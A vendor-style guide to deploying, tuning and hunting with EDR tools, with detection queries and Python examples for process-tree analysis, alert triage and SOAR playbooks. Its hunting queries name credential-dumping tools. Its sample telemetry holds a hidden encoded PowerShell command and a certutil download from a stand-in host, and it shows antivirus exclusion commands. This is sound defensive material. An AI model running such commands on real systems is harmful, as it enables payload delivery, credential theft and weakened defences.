EDR in the company: Deployment, Tuning and Incident Response
Endpoint Detection and Response (EDR) is the critical security layer for modern endpoints. This guide explains EDR architecture and deployment (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne, Carbon Black), how to properly configure EDR alerting (avoiding alert fatigue), how to use EDR data for threat hunting, and how to integrate EDR with SOAR and SIEM. Includes a comparison of EDR vs. XDR vs. MDR.
EDR has replaced traditional antivirus software—and is now the most important technical security measure at the endpoint level. But a misconfigured EDR is almost as bad as having none at all: too many alerts lead to alert fatigue, causing security teams to ignore even genuine threats. This guide explains not only what EDR is, but how to properly deploy, tune, and integrate it into security operations.
EDR Architecture
EDR System Architecture:
EDR Agent (Endpoint):
→ Runs on every endpoint (Windows/macOS/Linux)
→ Kernel-level integration: syscalls, API hooks, process monitoring
→ Telemetry collection:
- Process trees: Who started whom?
- Network connections: outbound/inbound connections
- File operations: Created, Read, Deleted, Modified
- Registry changes (Windows): Persistence mechanisms
- Memory: Injection detection, hollowing, reflective loading
- User logins: Which user on which system?
EDR Backend:
→ Cloud SaaS (CrowdStrike, SentinelOne) or On-Premise (Carbon Black)
→ Telemetry Collection: terabytes/day from all endpoints
→ Detection Engine: Behavioral Analytics + ML
→ Threat Intelligence Integration: known IOCs, TTPs
→ SIEM/SOAR integration via API
Detection mechanisms:
Signature-based:
→ Hash-based: known malware files
→ Fast, virtually no false positives, but catches only samples already known (a recompiled or repacked variant is missed)
→ Foundation for all EDRs
Behavior-based:
→ Process tree analysis: Office → PowerShell → cmd → certutil
→ Is this sequence normal for legitimate software?
→ Detects: fileless malware, Living-off-the-Land (LotL)
Machine Learning:
→ Anomaly detection: this system is behaving unusually
→ Unsupervised: no training with labels required
→ Online learning: learns new variants in real time
Memory Analysis:
→ Detect process injection (DLL injection, process hollowing)
→ Reflective DLL loading: a DLL is mapped straight from memory without ever being written to disk
→ Shellcode detection in legitimate process memory
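The process-tree analysis described under "Behavior-based" above, as an added example that is not code from this page or from any EDR vendor: it rebuilds parent/child chains from constructed process-creation telemetry and flags script hosts and LOLBins that descend from an Office application. The event tuple layout, the field names and the sample command lines are assumptions made for the example.

```python
"""Behaviour-based detection on a constructed process tree.

Added example for this guide (not code from any EDR vendor): it reconstructs
parent/child chains from process-creation telemetry and flags the
Office -> script host -> LOLBin sequences described above. The event tuple
layout and the field names are assumptions for the example.
"""

# Constructed sample telemetry: (pid, ppid, image name, command line).
SAMPLE_EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "winword.exe", "WINWORD.EXE /n invoice.docm"),
    (300, 200, "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA..."),
    (400, 300, "cmd.exe", "cmd.exe /c certutil.exe -urlcache -f https://example.invalid/x.txt x.txt"),
    (500, 400, "certutil.exe", "certutil.exe -urlcache -f https://example.invalid/x.txt x.txt"),
    (600, 100, "outlook.exe", "OUTLOOK.EXE"),
    # Benign admin activity: PowerShell started from the shell, not from Office.
    (700, 100, "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
    (800, 700, "cmd.exe", "cmd.exe /c ipconfig /all"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe"}
ENCODED_FLAGS = ("-encodedcommand", "-enc ")


def build_tree(events):
    """Index events by pid so that ancestry can be walked without rescanning."""
    return {
        pid: {"pid": pid, "ppid": ppid, "image": image.lower(), "cmdline": cmdline}
        for pid, ppid, image, cmdline in events
    }


def ancestry(pid, procs):
    """Return the image chain from the root ancestor down to pid (cycle-safe)."""
    chain, seen, cur = [], set(), pid
    while cur in procs and cur not in seen:
        seen.add(cur)
        chain.append(procs[cur]["image"])
        cur = procs[cur]["ppid"]
    return list(reversed(chain))


def find_suspicious_chains(events):
    """Flag script hosts and LOLBins that have an Office application as an ancestor.

    The same image (powershell.exe, cmd.exe) is benign when started by a user
    or an admin tool; the parent chain is what makes it suspicious.
    """
    procs = build_tree(events)
    watched = SCRIPT_HOSTS | LOLBINS
    findings = []
    for pid, proc in procs.items():
        if proc["image"] not in watched:
            continue
        chain = ancestry(pid, procs)
        if not any(image in OFFICE_APPS for image in chain[:-1]):
            continue
        reasons = [f"{proc['image']} descends from an Office application"]
        if any(flag in proc["cmdline"].lower() for flag in ENCODED_FLAGS):
            reasons.append("encoded PowerShell command line")
        if proc["image"] in LOLBINS:
            reasons.append("LOLBin in an Office-rooted chain")
        findings.append({"pid": pid, "chain": " -> ".join(chain), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding["pid"], finding["chain"], "|", "; ".join(finding["reasons"]))
```

Run as is, it reports the three processes under winword.exe (pids 300, 400, 500) and stays silent on the explorer.exe → powershell.exe → cmd.exe chain, which is the point of behaviour-based detection: the image name alone says nothing, the ancestry does. A production version would key on the EDR's process GUIDs rather than PIDs, because PIDs are reused.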
Market Leaders Compared
CrowdStrike Falcon:
Deployment: SaaS (no local infrastructure)
Agent: Lightweight (~10 MB RAM) – important for performance
Strengths: Market leader in the enterprise segment, best threat intelligence
Special feature: Threat Graph – universal graph of all activities
Falcon Modules:
Falcon Prevent: Protection (AV replacement)
Falcon Insight: EDR (Detection + Response)
Falcon Discover: Asset Discovery + Hygiene
Falcon Identity: AD integration, identity threat detection
Falcon Intelligence: Premium threat intelligence
Falcon Forensics: Endpoint forensics
Falcon Query Language (FQL):
# All connections to known C2 IPs in the last 24 hours:
event_simpleName=NetworkConnectIP4
| filter (RemoteIP="185.220.101.0/24" OR RemoteIP="23.27.163.0/24")
| since(24h)
| table(ComputerName, RemoteIP, RemotePort, ImageFileName)
# Suspicious PowerShell commands:
event_simpleName=ProcessRollup2
| filter FileName="powershell.exe"
AND CommandLine=~"*-EncodedCommand*|*-enc *|*IEX*|*Invoke-Expression*"
| table(ComputerName, UserName, CommandLine, timestamp)
---
Microsoft Defender for Endpoint (MDE):
Deployment: Native M365 integration (no additional product required for Windows customers!)
Agent: Integrated into Windows 10/11 (Windows Defender Service)
Strengths: Deepest Windows integration, cost-effective for M365 customers, ASR rules
Defender Attack Surface Reduction (ASR):
# Enable via PowerShell (or Intune). Set-MpPreference replaces the configured rule list;
# use Add-MpPreference to append a single rule. Use -Actions AuditMode first (Phase 1 monitoring) before Enabled:
Set-MpPreference -AttackSurfaceReductionRules_Ids <guid> `
-AttackSurfaceReductionRules_Actions Enabled
# Important ASR rules (GUID → rule):
75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 # Block Office applications from injecting code into other processes
d4f940ab-401b-4efc-aadc-ad5f3c50688a # Block all Office applications from creating child processes
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b3 # Block credential stealing from LSASS
be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 # Block executable content from email client and webmail
KQL queries in Microsoft Sentinel (Defender integration):
// Suspicious process hierarchy (=~ and in~ are case-insensitive; file names arrive in mixed case):
DeviceProcessEvents
| where InitiatingProcessFileName =~ "winword.exe"
and FileName in~ ("cmd.exe", "powershell.exe", "wscript.exe")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine
| order by Timestamp desc // Timestamp must survive the project, otherwise the sort fails
// LSASS Memory Access (a procdump clause is redundant: its command line already contains "lsass"):
DeviceProcessEvents
| where ProcessCommandLine contains "lsass"
| project DeviceName, AccountName, FileName, ProcessCommandLine, Timestamp
---
SentinelOne:
Deployment: SaaS + On-Premise Option
Strengths: Autonomous Response (without SOC intervention), Storyline (Attack Context)
Special Feature: ActiveEDR - AI-powered Autonomous Threat Response
Storyline Technology:
→ All events are correlated into "stories" (attack narrative)
→ Not individual alerts—but: "This is the story of the attack"
→ Visualization: Process tree + network + files in a graph
Autonomous Response:
→ Kill: Terminate suspicious process
→ Quarantine: Move file to quarantine
→ Rollback: Reverse ransomware damage (relies on Windows VSS snapshots, which must still be intact)
→ Network Isolate: Disconnect endpoint from network
SentinelOne Deep Visibility (Threat Hunting):
# STAR (SentinelOne Threat Intelligence Rules):
SELECT * FROM processes
WHERE process_name = "powershell.exe"
AND cmd_line CONTAINS "-EncodedCommand"
AND parent_process_name NOT IN ("svchost.exe", "msiexec.exe")
---
Carbon Black (VMware):
Deployment: On-premises (Carbon Black Enterprise EDR) or SaaS
Strengths: Deep recording, on-premises for regulated industries
Notable feature: Complete process recording – reconstructs attack timelines spanning several minutes
Carbon Black evaluation:
On-premises advantage: Data remains internal (healthcare, KRITIS, i.e. German critical-infrastructure operators)
Disadvantage: Infrastructure overhead, less cloud-native than competitors
Alert Tuning and Avoiding Alert Fatigue
Alert fatigue is the biggest EDR problem:
→ Too many false positives → SOC ignores alerts
→ Real attacks go unnoticed!
→ Goal: < 50 alerts/day per SOC analyst (guideline)
Tuning Process:
Phase 1 - Monitoring Mode (Weeks 1-2):
→ Start EDR in "Observe/Monitor" mode (no blocking)
→ Measure baseline alert volume
→ Goal: 0 blocks in the first week (user acceptance!)
Phase 2 - Alert Classification:
→ Each alert: TP (True Positive) / FP (False Positive) / Benign?
→ Identify top 10 alert types
→ Most common sources of false positives:
- IT tools: PSExec, Ansible, SCCM, remote management
- Developer tools: Compilers, debuggers, Git hooks
- Monitoring agents: Splunk Forwarder, Puppet
- Backup software: Veeam, Commvault
Phase 3 - Exclusion Rules:
# CrowdStrike Exclusion (API/Console):
Indicator Exclusion:
Process: "C:\Program Files\Ansible\python.exe"
Type: Process Exclusion
Reason: Legitimate Ansible management tool
Scope: All servers (Server OU)
# MDE Exclusion via PowerShell (these are Defender Antivirus exclusions, not EDR detection suppressions):
# A wildcard process exclusion covers every binary under the folder; prefer the specific executable where possible.
Add-MpPreference -ExclusionProcess "C:\Program Files\Veeam\*"
Add-MpPreference -ExclusionPath "C:\ProgramData\Backup\temp"
⚠️ Exclusion Principles:
→ As specific as possible (path + process, not just path)
→ Never: exclude entire drives or system directories
→ Documentation: why was the exception added? Reviewer?
→ Quarterly Review: remove outdated exclusions!
Phase 4 - Alert Thresholds:
HIGH Priority (always respond immediately):
→ LSASS Memory Access / Credential Dump
→ Lateral Movement (PsExec/WMI from unknown source)
→ Ransomware behavior (Mass Encryption)
→ C2 callback to known IOC IP
→ Privilege Escalation: Token Impersonation
MEDIUM Priority (within 4 hours):
→ PowerShell Encoded Command
→ Suspicious Scheduled Task
→ User adds themselves to local admin group
→ Suspicious Office Macro
LOW Priority (daily in batch):
→ Internal port scanning (pentest or IT tool?)
→ Known PUAs (Potentially Unwanted Apps)
→ Outdated signatures on legacy systems
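One way to turn the four tuning phases into a repeatable workflow, as an added example that is not part of any EDR product: it maps alert types onto the HIGH / MEDIUM / LOW tiers above, produces the Phase 2 figures (top alert types, false-positive share, top FP sources, load against the 50-alerts-per-analyst guideline) and checks an exclusion request against the exclusion principles from Phase 3. The alert records, host names and process names are constructed.

```python
"""Alert triage and exclusion hygiene helper for EDR tuning.

Added example for the four tuning phases above; it is not part of any EDR
product. The alert records and the exclusion requests are constructed, the
priority tiers and the exclusion principles are the ones stated in the guide,
and the 50-alerts-per-analyst-per-day figure is the guideline quoted there.
"""
from collections import Counter
from dataclasses import dataclass
import ntpath

# Phase 4 tiers, keyed by substrings of the alert type name.
PRIORITY_RULES = {
    "HIGH": ("lsass", "credential dump", "lateral movement", "ransomware",
             "c2 ", "token impersonation"),
    "MEDIUM": ("encoded command", "scheduled task", "local admin", "office macro"),
    "LOW": ("port scan", "pua", "outdated signature"),
}
ALERTS_PER_ANALYST_DAY = 50  # guideline from the guide


@dataclass
class Alert:
    alert_type: str
    host: str
    process: str           # what raised the alert; the FP-source dimension
    verdict: str = "open"  # TP / FP / Benign / open (Phase 2 classification)


def prioritize(alert_type):
    """Map an alert type onto the HIGH / MEDIUM / LOW response tiers."""
    name = alert_type.lower()
    for tier, needles in PRIORITY_RULES.items():
        if any(needle in name for needle in needles):
            return tier
    return "MEDIUM"  # unknown types get the 4-hour window, never the daily batch


def tuning_report(alerts, analysts, days):
    """Phase 2 figures: top alert types, FP share, top FP sources, analyst load."""
    closed = [a for a in alerts if a.verdict != "open"]
    noise = [a for a in closed if a.verdict in ("FP", "Benign")]
    per_analyst_day = len(alerts) / analysts / days
    return {
        "top_types": Counter(a.alert_type for a in alerts).most_common(10),
        "fp_rate": round(len(noise) / len(closed), 2) if closed else 0.0,
        "top_fp_sources": Counter(a.process for a in noise).most_common(5),
        "alerts_per_analyst_day": round(per_analyst_day, 1),
        "within_guideline": per_analyst_day < ALERTS_PER_ANALYST_DAY,
    }


def validate_exclusion(process_path, reason="", reviewer=""):
    """Phase 3 principles: path + executable, no drives or system dirs, documented."""
    problems = []
    path = process_path.lower().replace("/", "\\")
    _drive, rest = ntpath.splitdrive(path)
    if rest.strip("\\*") == "":
        problems.append("excludes an entire drive")
    if rest == "\\windows" or rest.startswith("\\windows\\"):
        problems.append("excludes a system directory")
    base = ntpath.basename(path)
    if "*" in base or not base.endswith(".exe"):
        problems.append("not specific: path plus executable name required")
    if not reason.strip():
        problems.append("no documented reason")
    if not reviewer.strip():
        problems.append("no reviewer recorded")
    return {"accepted": not problems, "problems": problems}


# Constructed Phase 2 sample: analyst verdicts for one day, condensed.
SAMPLE_ALERTS = [
    Alert("PowerShell Encoded Command", "WS-017", "ansible/python.exe", "FP"),
    Alert("PowerShell Encoded Command", "WS-022", "ansible/python.exe", "FP"),
    Alert("PowerShell Encoded Command", "WS-031", "unknown", "TP"),
    Alert("LSASS Memory Access", "DC-01", "procdump.exe", "TP"),
    Alert("Suspicious Scheduled Task", "FS-02", "backup-agent.exe", "Benign"),
    Alert("Internal Port Scan", "WS-009", "vuln-scanner.exe", "Benign"),
    Alert("Ransomware Behaviour (Mass Encryption)", "FS-02", "unknown"),
]

if __name__ == "__main__":
    print(tuning_report(SAMPLE_ALERTS, analysts=2, days=1))
    print(validate_exclusion(r"C:\Program Files\Ansible\python.exe", "Ansible management", "j.doe"))
    print(validate_exclusion(r"C:\Program Files\Veeam\*", "backup", "j.doe"))
```

The report shows why Phase 2 comes before Phase 3: two of the three encoded-command alerts come from the same management tool, which is exactly the exclusion candidate, whereas the third is a true positive that a blanket "ignore encoded commands" rule would have hidden. The validator rejects the wildcard Veeam exclusion for the reason the principles give (a folder, not a process) and accepts the Ansible one.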
EDR for Threat Hunting
Threat Hunting with EDR Telemetry:
Proactive Hunting - Hypothesis-Driven:
Hypothesis 1: Kerberoasting attempt
// MDE KQL (KQL has no contains_any; has_any is term-based and case-insensitive):
DeviceProcessEvents
| where ProcessCommandLine has_any ("kerberoast", "GetUserSPNs", "asreproast")
or FileName in~ ("Rubeus.exe", "PowerView.ps1")
| project DeviceName, AccountName, ProcessCommandLine, Timestamp
Hypothesis 2: LSASS credential dump
DeviceProcessEvents
| where ProcessCommandLine contains "lsass"
or (FileName == "procdump.exe")
or (InitiatingProcessFileName == "powershell.exe"
and ProcessCommandLine contains "sekurlsa")
| project DeviceName, AccountName, FileName, ProcessCommandLine, Timestamp
Hypothesis 3: Persistence via Run Keys
// Custom allowlist of expected autorun value names; the two entries are placeholders,
// fill the list from your own baseline:
let known_autoruns = dynamic(["SecurityHealth", "OneDrive"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
and RegistryKey endswith @"\CurrentVersion\Run" // matches HKLM and HKCU Run, not RunOnce
and RegistryValueName !in (known_autoruns)
| project DeviceName, InitiatingProcessAccountName, RegistryKey, RegistryValueName, RegistryValueData, Timestamp
Hypothesis 4: Lateral Movement via SMB
DeviceNetworkEvents
| where RemotePort == 445
and InitiatingProcessFileName !in ("System", "svchost.exe")
| summarize count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where count_ > 5 // multiple SMB connections from an unusual process
Hypothesis 5: Unusual Parent-Child Process (LotL)
DeviceProcessEvents
| where InitiatingProcessFileName in ("winword.exe", "excel.exe", "powerpnt.exe")
and FileName in ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")
| project DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, Timestamp
MITRE ATT&CK Mapping in Hunting:
T1003 (OS Credential Dumping) → Hypothesis 2
T1053 (Scheduled Task/Job) → Scheduled Task Hunt
T1021 (Remote Services) → Hypothesis 4
T1059 (Command and Scripting) → Hypothesis 5
T1547 (Boot/Logon Autostart) → Hypothesis 3
EDR Integration in Security Operations
SIEM Integration:
CrowdStrike → Splunk:
# Splunk Add-on for CrowdStrike:
index=crowdstrike sourcetype=crowdstrike:events:json
| eval severity=case(
Severity>=80, "CRITICAL",
Severity>=60, "HIGH",
Severity>=40, "MEDIUM",
true(), "LOW")
| stats count by ComputerName, DetectDescription, severity
MDE → Microsoft Sentinel:
# Data Connector: "Microsoft 365 Defender"
# Automatic forwarding of all MDE tables to Sentinel:
DeviceEvents, DeviceProcessEvents, DeviceNetworkEvents,
DeviceFileEvents, DeviceRegistryEvents, DeviceAlertEvents
# Sentinel Workbook: "Endpoint Threat Protection"
# → Out-of-the-box dashboard for MDE data
SOAR Integration:
Incident → SOAR Playbook:
1. Alert received from EDR
2. SOAR checks: Is the endpoint critical? (CMDB lookup)
3. Enrichment: IP reputation, user context (AD)
4. Auto-response (depending on severity):
LOW: Create ticket + notify analyst
MEDIUM: Isolate endpoint (EDR API) + ticket
HIGH: Isolate + deactivate user (AD API) + escalation!
# Defender API: Isolate endpoint:
POST https://api.securitycenter.microsoft.com/api/machines/{machineId}/isolate
{
"Comment": "Incident #1234 - Credential dumping detected",
"IsolationType": "Full"
}
# SentinelOne API: Network Disconnect:
POST /web/api/v2.1/agents/actions/disconnect
{
"filter": {"ids": ["agent_id_here"]},
"data": {}
}
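The playbook steps above as a runnable skeleton, added here as an example that is not code from any SOAR or EDR vendor. The CMDB, IP-reputation and directory lookups are constructed in-memory tables, and every outbound call goes through an injected `send` function, so nothing is contacted when it runs. The Defender isolate endpoint and body and the SentinelOne disconnect body are the ones quoted above; the sample IP is constructed from the range in the Falcon query earlier on the page; the rule that a critical asset is never isolated automatically, and the placeholder directory call, are assumptions.

```python
"""SOAR playbook for EDR alerts, runnable offline.

Added example for the playbook steps above; it is not code from any SOAR or
EDR vendor. The CMDB, IP-reputation and directory lookups are constructed
in-memory tables, and every outbound call goes through an injected `send`
function, so nothing is contacted. The Defender isolate endpoint and body and
the SentinelOne disconnect body are the ones quoted in the guide; the rule
that critical assets are never isolated automatically is an assumption.
"""
from dataclasses import dataclass

DEFENDER_API = "https://api.securitycenter.microsoft.com/api"
SEVERITY_ORDER = ["LOW", "MEDIUM", "HIGH"]

# Constructed lookup tables standing in for the CMDB, threat intel and AD.
CMDB = {"WS-017": {"critical": False, "owner": "j.doe"},
        "DC-01": {"critical": True, "owner": "ad-team"}}
IP_REPUTATION = {"185.220.101.5": "known-c2", "10.0.0.12": "internal"}
DIRECTORY = {"j.doe": {"admin": False}, "svc-backup": {"admin": True}}


@dataclass
class EdrAlert:
    machine_id: str   # vendor-side id used in the API path
    hostname: str
    user: str
    remote_ip: str
    severity: str     # LOW / MEDIUM / HIGH as emitted by the EDR
    incident: str


def defender_isolate(machine_id, comment):
    """Defender for Endpoint 'isolate' call as quoted in the guide."""
    return {"method": "POST", "url": f"{DEFENDER_API}/machines/{machine_id}/isolate",
            "body": {"Comment": comment, "IsolationType": "Full"}}


def sentinelone_disconnect(agent_id, comment):
    """SentinelOne network-disconnect call as quoted in the guide (comment unused)."""
    return {"method": "POST", "url": "/web/api/v2.1/agents/actions/disconnect",
            "body": {"filter": {"ids": [agent_id]}, "data": {}}}


ISOLATE = {"defender": defender_isolate, "sentinelone": sentinelone_disconnect}


def enrich(alert):
    """Steps 2 and 3: criticality from the CMDB, IP reputation, user context."""
    asset = CMDB.get(alert.hostname, {})
    return {"critical_asset": asset.get("critical", False),
            "owner": asset.get("owner", "unknown"),
            "ip_reputation": IP_REPUTATION.get(alert.remote_ip, "unknown"),
            "user_is_admin": DIRECTORY.get(alert.user, {}).get("admin", False)}


def run_playbook(alert, send, vendor="defender"):
    """Step 4: choose the response tier and perform it through `send`."""
    ctx = enrich(alert)
    severity = alert.severity.upper()
    # Enrichment can only raise the tier: a known-bad remote IP bumps it one step.
    if ctx["ip_reputation"] == "known-c2" and severity != "HIGH":
        severity = SEVERITY_ORDER[SEVERITY_ORDER.index(severity) + 1]
    actions = [f"ticket:{alert.incident}"]
    if severity == "LOW":
        actions.append(f"notify:{ctx['owner']}")
    elif ctx["critical_asset"]:
        # Assumption: never auto-isolate a critical asset; a human approves first.
        actions.append(f"approval-required:isolate:{alert.hostname}")
    else:
        send(ISOLATE[vendor](alert.machine_id, f"Incident {alert.incident} - automated containment"))
        actions.append(f"isolate:{alert.hostname}")
    if severity == "HIGH":
        # Placeholder for the directory call; substitute whatever your AD/IdP API offers.
        send({"method": "POST", "url": "placeholder://directory/disable-user",
              "body": {"user": alert.user}})
        actions.append(f"disable-user:{alert.user}")
        actions.append("escalate:soc-lead")
    return {"severity": severity, "actions": actions, "context": ctx}


def run_offline(alert, vendor="defender"):
    """Run the playbook with a recording sender; returns the result plus would-be requests."""
    sent = []
    result = run_playbook(alert, sent.append, vendor)
    result["sent"] = sent
    return result


if __name__ == "__main__":
    alert = EdrAlert("m-001", "WS-017", "j.doe", "185.220.101.5", "MEDIUM", "#1234")
    print(run_offline(alert))
```

The injected `send` is the design choice worth copying: the decision logic is testable without an EDR tenant, and swapping `run_offline`'s recorder for a real HTTP client is the only change needed to go live. The CMDB check in step 2 is what keeps a MEDIUM alert on a domain controller from triggering an automatic network isolation of the DC.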
EDR vs. XDR vs. MDR:
EDR: Endpoint-only telemetry, self-managed
→ Good for: Companies with their own SOC
XDR: Endpoint + Network + Email + Cloud (correlated)
→ CrowdStrike Falcon XDR, MDE + Sentinel, SentinelOne XDR
→ Better: broader visibility, fewer alert silos
MDR (Managed Detection and Response):
→ External SOC provider operates EDR/XDR
→ 24/7 monitoring without an in-house SOC team
→ Providers: CrowdStrike Falcon Complete, SentinelOne Vigilance, AWARE7 SOC
→ Recommended for SMBs without an in-house security team!
Sizing and Costs
EDR Cost Overview (Enterprise Pricing):
CrowdStrike Falcon:
Falcon Go: ~$5/endpoint/month (SMB)
Falcon Pro: ~$8–10/endpoint/month
Falcon Enterprise: ~$15–20/endpoint/month (incl. Threat Intel)
Falcon Complete: ~$25+/endpoint/month (MDR included)
Microsoft Defender for Endpoint:
Plan 1: €2.10/user/month (included in M365 Business Premium!)
Plan 2: €4.20/user/month (included in M365 E5!)
→ Often little to no additional cost for M365 customers!
SentinelOne:
Singularity Core: ~$5/endpoint/month
Singularity Control: ~$8/endpoint/month
Singularity Complete: ~$12–15/endpoint/month (with Storyline+)
Sizing guidelines:
100 endpoints: CrowdStrike Pro ~€1,000/month
500 endpoints: CrowdStrike Pro ~€4,500/month
1,000 endpoints: Enterprise tier, ~€8-12k/month
TCO calculation (the licence is only part of the cost):
Licenses: ~60% of total costs
Deployment: Initial ~40 hours for 500 endpoints
Tuning (ongoing): ~4–8 hours/month for alert tuning
SOC staff: largest cost factor! (1 analyst ~€70–80k/year)
→ MDR is often more cost-effective than an internal SOC for <2,000 endpoints
About the Author
Managing partner of AWARE7 GmbH with many years of expertise in information security, penetration testing and IT risk management. Graduate of the master's programme in Internet Security at Westfälische Hochschule (if(is), Prof. Norbert Pohlmann). Bestselling author with Wiley-VCH and lecturer at the ASW-Akademie. Assessments of cybersecurity and digital sovereignty have appeared in Welt am Sonntag, WDR, Deutschlandfunk and Handelsblatt, among others.
10 Publications
- Use of Electronic Encryption - Obstacles for Businesses (2018)
- IT Encryption Compass - Guidance for SMEs (2018)
- IT Security Day 2025 - Live Hacking: AI in Cybersecurity (2025)
- Live Hacking - Credential Stuffing: Financial Risks beyond Ransomware (2025)
- Keynote: Live Hacking Show - A Look into the World of Cybercrime (2025)
- Analysis of Attack Surfaces at Shared-Hosting Providers (2024)
- Goosebumps Guaranteed: The Creepiest Findings from the Life of a Pentester (2022)
- IT Security Certifications — CISSP, T.I.S.P. & Co (Live Webinar) (2023)
- Online Banking Security Forum — Live Hacking (2021)
- Nipsters on the Net and the End of the Chalk Era (2017)